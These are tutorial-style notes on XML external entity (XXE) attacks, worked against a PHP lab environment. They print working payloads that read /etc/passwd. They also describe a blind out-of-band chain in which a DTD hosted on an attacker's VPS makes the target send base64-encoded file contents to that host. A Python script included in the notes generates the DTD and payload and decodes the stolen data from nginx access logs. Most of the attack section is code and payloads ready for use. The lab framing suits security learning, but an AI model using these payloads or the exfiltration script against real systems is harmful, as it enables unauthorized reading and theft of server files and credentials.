Notes on Getting Started with XXE Attacks


Prerequisites

A summary of learning and exploiting XXE vulnerabilities

Learning Blind XXE from a few CTF challenges

XXE without echo (out-of-band exfiltration with a payload hosted on a VPS)

I. Trying the basics

Lab environment: BUUOJ: [PHP]XXE

Source code: github.com/vulhub/vulh…

Reading the source shows that, with libxml 2.8.0, all three of the ways PHP parses XML are affected (libxml 2.9.0 and later stop loading external entities by default, which is why the lab pins the older version):

new SimpleXMLElement($data)
$dom = new DOMDocument(); $dom->loadXML($data);
simplexml_load_string($data)

Below, the case where the front end echoes the result and the case where it does not are reproduced in turn.

0x00 With echo

In this challenge the application does $data = file_get_contents('php://input'); and displays the contents of the name tag, so an entity referenced inside name is echoed straight back. POST this XML:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>
<name>&xxe;</name>
</root>

0x01 Without echo

1. Buying a VPS

Just grab one in the Double 12 sale.

2. Setting up nginx (or apache)

Already done when I set up my blog; skipped.

3. Testing against the lab above

First create a file named 1pay.dtd in the VPS web root with the following content (replace ip with the VPS's public IP). The file is read through php://filter so that the result is base64: raw file contents would not survive inside a URL or an entity value. The &#x25; is a percent sign written as a character reference, which is required when a parameter entity reference is nested inside another entity's value:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://ip/?p=%file;'>">

On the VPS the nginx access log is at /var/log/nginx/access.log; use tail to read the end of the file and wait for new lines:

tail -f /var/log/nginx/access.log

Then POST the payload. It only references the hosted DTD; %dtd; fetches it, %int; declares the send entity, and %send; makes the target request the VPS with the base64 file contents in the query string:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag[
<!ENTITY % dtd SYSTEM "http://ip/1pay.dtd">
%dtd;
%int;
%send;
]>

The log shows:

117.21.200.166 - - [14/Dec/2021:20:55:05 +0800] "GET /1pay.dtd HTTP/1.0" 200 174 "-" "-" "-"
117.21.200.166 - - [14/Dec/2021:20:55:06 +0800] "GET /?p=… HTTP/1.0" 200 32029 "-" "-" "-"

Base64-decode the value of p to recover the file contents. Two caveats: libxml sends the query string verbatim, so +, / and = appear unchanged in the log and must not be URL-decoded twice; and a large file can push the request line past nginx's default 8k limit, in which case nginx answers 414 and nothing usable is logged, so exfiltrate small files or read them through a filter chain that trims the output.
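The attacker side of the out-of-band chain above (hosting the DTD, POSTing the payload, reading the hits out of access.log), as an added Python example that is not code from the original post or from vulhub. The VPS address 203.0.113.10, the client address 203.0.113.77 and the two access.log lines are constructed for the demonstration; the second line carries the base64 of one /etc/passwd line.

```python
"""Attacker-side helpers for the blind (no-echo) XXE chain.

build_dtd()/build_payload() generate the two artefacts the post hosts on the
VPS and POSTs to the target; decode_access_log() pulls the base64 that
libxml sends back in the ?p= query string out of nginx access.log lines.
"""
import base64
import re
from urllib.parse import unquote

VPS = "203.0.113.10"   # hypothetical attacker host (RFC 5737 documentation range)
DTD_NAME = "1pay.dtd"


def build_dtd(vps: str, target_file: str = "/etc/passwd") -> str:
    """External DTD served from the VPS web root.

    php://filter base64-encodes the file so it fits inside a URL; &#x25; is '%'
    as a character reference, required for a nested parameter entity reference.
    """
    return (
        f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode'
        f'/resource=file://{target_file}">\n'
        f'<!ENTITY % int "<!ENTITY &#x25; send SYSTEM \'http://{vps}/?p=%file;\'>">\n'
    )


def build_payload(vps: str, dtd_name: str = DTD_NAME) -> str:
    """XML document POSTed to the target; it only references the hosted DTD."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE roottag [\n'
        f'<!ENTITY % dtd SYSTEM "http://{vps}/{dtd_name}">\n'
        '%dtd;\n%int;\n%send;\n]>\n'
        '<roottag/>\n'
    )


# nginx "combined"-style line: client - - [time] "GET /?p=... HTTP/x" status ...
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET /\?p=([^ "]+) HTTP/[\d.]+" (\d{3})'
)


def b64decode_lenient(data: str) -> bytes:
    """Decode base64 that travelled inside a URL.

    libxml sends the query verbatim, so '+', '/' and '=' are normally logged
    as-is; unquote() only matters if a proxy percent-encoded them. Padding is
    re-added in case the request line was cut at a buffer limit.
    """
    raw = unquote(data)
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw)


def decode_access_log(lines):
    """Yield (client_ip, timestamp, decoded_bytes) for each exfiltration hit.

    The GET /1pay.dtd fetch and any unrelated requests are skipped.
    """
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, blob, _status = m.groups()
        yield ip, ts, b64decode_lenient(blob)


# Constructed sample log: the DTD fetch followed by the exfiltration hit.
SAMPLE_LOG = [
    '203.0.113.77 - - [14/Dec/2021:20:55:05 +0800] "GET /1pay.dtd HTTP/1.0" '
    '200 174 "-" "-" "-"',
    '203.0.113.77 - - [14/Dec/2021:20:55:06 +0800] '
    '"GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= HTTP/1.0" '
    '200 32029 "-" "-" "-"',
]


def exfiltrated_files(lines):
    """Return just the decoded file contents, one entry per hit."""
    return [data for _ip, _ts, data in decode_access_log(lines)]


if __name__ == "__main__":
    print(build_dtd(VPS))
    print(build_payload(VPS))
    for ip, ts, data in decode_access_log(SAMPLE_LOG):
        print(f"{ts} from {ip}:\n{data.decode(errors='replace')}")
```

Write build_dtd(VPS) to 1pay.dtd in the web root, POST build_payload(VPS) to the target, then pipe `tail -f /var/log/nginx/access.log` into decode_access_log instead of decoding each hit by hand.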

II. Triggering phar deserialization

To be updated.